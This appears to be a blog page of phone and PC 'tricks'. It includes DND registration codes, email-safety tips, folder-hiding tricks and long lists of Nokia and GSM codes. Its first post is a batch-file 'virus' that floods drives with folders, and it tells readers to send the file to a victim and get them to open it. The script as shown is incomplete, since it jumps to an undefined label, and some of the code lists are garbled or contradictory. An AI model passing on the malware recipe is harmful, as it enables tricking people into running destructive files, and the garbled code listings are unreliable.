Monday, October 15, 2018

Make Simple Virus In Notepad

Make Simple Virus in Notepad

Making Simple Virus With Notepad In Windows

Here we are going to show, How to make Simple Virus in notepad. This virus will create Unlimited Folder in each drive. Let's Start.

[ Note : Don't try it on your computer ]

Step 1: Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]

Step 2 : Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]

@echo off
cd /d C:
cd /d D:
cd /d E:
goto VIRUS
REM #######################

Step 3: Now Give this file to Victim via Pen-drive or Mail then ask to Open it.

Do Not Disturb

Do Not Disturb

Activate DND on any Network

DND is Do not Disturb Service. If you want to stop Unwanted Telemarketing Calls and SMS. you have to Register your Number For DND.

Send sms START <Option> to 1909 (TollFree)

STOP 0 >> 1909 - to STOP ALL Promotional Calls and SMS
STOP 1 >> 1
909 - to STOP ALL promotional calls and to receive promotional message only from Banking/Insurance/Financial Products/Credit Cards
STOP 2 >> 1909 - to STOP ALL promotional calls and to receive promotional message on Real Estate
STOP 3 >> 1909 - to STOP ALL promotional calls and to receive promotional message on Education
STOP 4 >> 1909 - to STOP ALL promotional calls and to receive promotional message on Health
STOP 5 >> 1909 - to STOP ALL promotional calls and to receive promotional message on Consumer Goods and automobiles
STOP 6 >> 1909 - STOP ALL promotional calls and to receive promotional message from Communication/Broadcasting/Entertainment Option 
STOP 7 >> 1909 - to STOP ALL promotional calls and to receive promotional message on Tourism and Leisure

Protection of Email Account

Protection of Email Account

Protect Your Email Account From Hacker

Now a days email account is easily hacked by Professional hacker. here is some tips to how to prevent your account from hacker. Must Follow this.

>> Always configure a Secondary Email Address for the recovery purpose.

>> Add your phone number and security question in your email account. 

 >> Select strong password.

 Like >> *knowLedgefactory@6May2012@aug2012@facebookgroups# Use some character in ur password. This password is easy to remember but it is not easy to hack.

>> Change your password after one month or 15 days. 

 >> Take Care of the Phishing Links. Do not Click one any link like security purpose or something like that.

>> Do not Share your password to your Friends or anybody. 
>> Do not use other computer for check your mails.

>> Turn one 2 Step Verification in gmail account. 

>> Always use https:// Do not use http://

>> Always enter link in address bar with https:// for open any aacount. Do not search from google or any search engine

Hide folder in Mobile

Hide Folder in Mobile

Hide Folder In JAVA Supported Mobile

Step 1 :  First Choose Folder which you want to Hide.

Step 2 :  Now Rename it with .jad extension. [ Suppose you want to hide folder "image" then rename it with "image.jad" ]

Step 3 :  Now Create another folder with same name but .jar extension in the same directory. [ Create Folder "image.jar" ]

>> And Thats it! Your Folder "image.jad" has been Hidden.
>> When you want to access this folder "image.jad" then just Rename "image.jar" Folder to "image.ja"

[Note : Its not working in some mobile]

Invisible Folder In Mobile

Invisible Folder in Mobile

Make Invisible Folder In Mobile

Step : 1  You can now also make in visible folder in mobile. you have to just rename your folder with .ota extension.
[e.g images.ota]
NOTE:-Its not working  on some mobiles..

Sunday, October 14, 2018

Mobile phone secret& Tricks ;;;NOKIA

Mobile Phone Secrets & Tricks* *.:: NOKIA ::.* 
*Nokia Universal Codes* *Code Description : 
*These Nokia codes will work on most Nokia Mobile Phones
*(11)* #pw+1234567890+4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" *(1) * *3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5% 
*(2)* #3370# Deactivate Enhanced Full Rate Codec (EFR) OR *3370# ( *F*avourite ) 
*(3)* *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time. 
*(4)* *#4720# Deactivate Half Rate Codec. 
*(5)* *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type. ( *F*avourite ) 
*(6)* *#9999# Phones software version if *#0000# does not work. 
*(7)* *#06# For checking the International Mobile Equipment Identity (IMEI Number). (* F*avourite ) 
*(8)* #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols). 
*(9)* #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols). 
*(10)* #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols). 
*(12)* *#147# (vodafone) this lets you know who called you last. 
*(13)* *#1471# Last call (Only vodofone). 
*(14)* *#21# Allows you to check the number that "All Calls" are diverted to 
*(15)* *#2640# Displays security code in use. 
*(16)* *#30# Lets you see the private number. 
*(17)* *#43# Allows you to check the "Call Waiting" status of your phone. 
*(18)* *#61# Allows you to check the number that "On No Reply" calls are diverted to. 
*(19)* *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to. 
*(20)* *#67# Allows you to check the number that "On Busy Calls" are diverted to. 
*(21)* *#67705646# Removes operator logo on 3310 & 3330. 
*(22)* *#73# Reset phone timers and game scores. 
*(23)* *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible. 
*(24)* *#7760# Manufactures code. 
*(25)* *#7780# Restore factory settings. 
*(26)* *#8110# Software version for the nokia 8110. 
* * 
*(27)* *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.PurchaseDate, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again. ( *F*avourite ) 
*(28)* *#94870345123456789# Deactivate the PWM-Mem. 
*(29)* **21*number# Turn on "All Calls" diverting to the phone number entered. 
*(30)* **61*number# Turn on "No Reply" diverting to the phone number entered. 
*(31)* **67*number# Turn on "On Busy" diverting to the phone number 
*(32)* 12345 This is the default security code. 
* * press and hold # Lets you switch between lines *NOKIA 5110/5120/5130/5190
* IMEI number: * # 0 6 # 
Software version: * # 0 0 0 0 # 
Simlock info: * # 9 2 7 0 2 6 8 9 # 
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off] 
Half Rate: * 4 7 2 0 # 
Provider lock status: #pw+1234567890+1 
Network lock status #pw+1234567890+2 
Provider lock status: #pw+1234567890+3 
SimCard lock status: #pw+1234567890+4 *NOKIA 6110/6120/6130/6150/6190* IMEI number: * # 0 6 # 
Software version: * # 0 0 0 0 # 
Simlock info: * # 9 2 7 0 2 6 8 9 # 
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off] 
Half Rate: * 4 7 2 0 # *NOKIA 3110* IMEI number: * # 0 6 # 
Software version: * # 0 0 0 0 # or * # 9 9 9 9 # or * # 3 1 1 0 # 
Simlock info: * # 9 2 7 0 2 6 8 9 # *NOKIA 3330* *#06# 
This will show your warranty details *#92702689# *3370# 
Basically increases the quality of calling sound, but decreases battery length. 
#3370# Deactivates the above 
*#0000# Shows your software version 
*#746025625#This shows if your phone will allow sim clock stoppage *4370# 
Half Rate Codec activation. It will automatically restart #4370# 
Half Rate Codec deactivation. It will automatically restart Restore Factory Settings 
To do this simply use this code *#7780# Manufacturer Info 
Date of Manufacturing *#3283# *3001#12345# (TDMA phone only)


isteyak ansari

 GSM codes 
GSM Codes

The following codes are the standard GSM codes for various network services. Most Nokia phones have easier ways to activate them through the menus. Check the guides for your model.

Call Diverting

To Activate: * * 21 * NUMBER # [SEND]
To Cancel: # # 21 # [SEND]
To Check: * # 21 # [SEND]
No Answer
To Activate: * * 61 * NUMBER # [SEND]
To Cancel: # # 61 # [SEND]
To Check: * # 61 # [SEND]
To Activate: * * 62 * NUMBER # [SEND]
To Cancel: # # 62 # [SEND]
To Check: * # 62 # [SEND]
To Activate: * * 67 * NUMBER # [SEND]
To Cancel: # # 67 # [SEND]
To Check: * # 67 # [SEND]
To Cancel All Call Forwarding # # 002 # [SEND]

Diverting Data Calls

To Activate: * * 21 * NUMBER * 25 # [SEND]
To Cancel: # # 21 # * 25 [SEND]
To Check Status: * # 21 # * 25 # [SEND]
No Answer
To Activate: * * 61 * NUMBER * 25 # [SEND]
To Cancel: # # 61 * 25 # [SEND]
To Check Status: * # 61 # * 25 # [SEND]
To Activate: * * 62 * NUMBER * 25 # [SEND]
To Cancel: # # 62 # * 25 # [SEND]
To Check Status: * # 62 # * 25 # [SEND]
To Activate: * * 67 * NUMBER * 25 # [SEND]
To Cancel: # # 67 # * 25 # [SEND]
To Check Status: * # 67 # * 24 # [SEND]

Diverting Fax Calls

To Activate: * * 21 * NUMBER * 13 #[SEND]
To Cancel: # # 21 # * 13 # [SEND]
To Check Status: * # 21 # * 13 # [SEND]
No Answer
To Activate: * * 61 * NUMBER * 13 # [SEND]
To Cancel: # # 61 * 13 # [SEND]
To Check Status: * # 61 # * 13 # [SEND]
To Activate: * * 62 * NUMBER * 13 # [SEND]
To Cancel: # # 62 # * 13 # [SEND]
To Check Status: * # 62 # * 13 # [SEND]
To Activate: * * 67 * NUMBER * 13 # [SEND]
To Cancel: # # 67 # * 13 # [SEND]
To Check Status: * # 67 # * 13 #[SEND]

Call Barring

Before you can activate these barring services you will need a barring code from your service provider. Call Barring can not be activated if Call Forwarding diverts are already in use.

All Calls
To Activate: * 330 * BARRING CODE # [SEND]
To Cancel: # 330 * BARRING CODE # [SEND]
To Check: * # 330 # [SEND]
All Outgoing Calls
To Activate: * 333 * BARRING CODE # [SEND]
To Cancel: # 333 * BARRING CODE # [SEND]
To Check: * # 333 # [SEND]
All Incoming Calls
To Activate: * 353 * BARRING CODE # [SEND]
To Cancel: # 353 * BARRING CODE # [SEND]
To Check: * # 353 # [SEND]
All Outgoing Calls
To Activate: * 33 * BARRING CODE# [SEND]
To Cancel: # 33 * BARRING CODE # [SEND]
To Check: * # 33 # [SEND]
All Outgoing International Calls
To Activate: * 331 * BARRING CODE# [SEND]
To Cancel: # 331 * BARRING CODE # [SEND]
To Check: * # 331 # [SEND]
All Outgoing International Calls Except To Home Country
To Activate: * 332 * BARRING CODE# [SEND]
To Cancel: # 332 * BARRING CODE # [SEND]
To Check: * # 332 # [SEND]
All Incoming Calls
To Activate: * 35 * BARRING CODE # [SEND]
To Cancel: # 35 * BARRING CODE # [SEND]
To Check: * # 35 # [SEND]
All Incoming Calls When Outside Home Country
To Activate: * 351 * BARRING CODE # [SEND]
To Cancel: # 351 * BARRING CODE # [SEND]
To Check: * # 351 # [SEND]
Canceling All Call Barring # 330 * BARRING CODE # [SEND]

Call Waiting

To Activate: * 43 # [SEND]
To Deactivate: # 43 # [SEND]
To Check: * # 43 # [SEND]

Calling Line Identity

To Activate: * 31 # [SEND]
To Deactivate: # 31 # [SEND]
To Check: * # 31 # [SEND]
To Activate: * 30 # [SEND]
To Deactivate: # 30 # [SEND]


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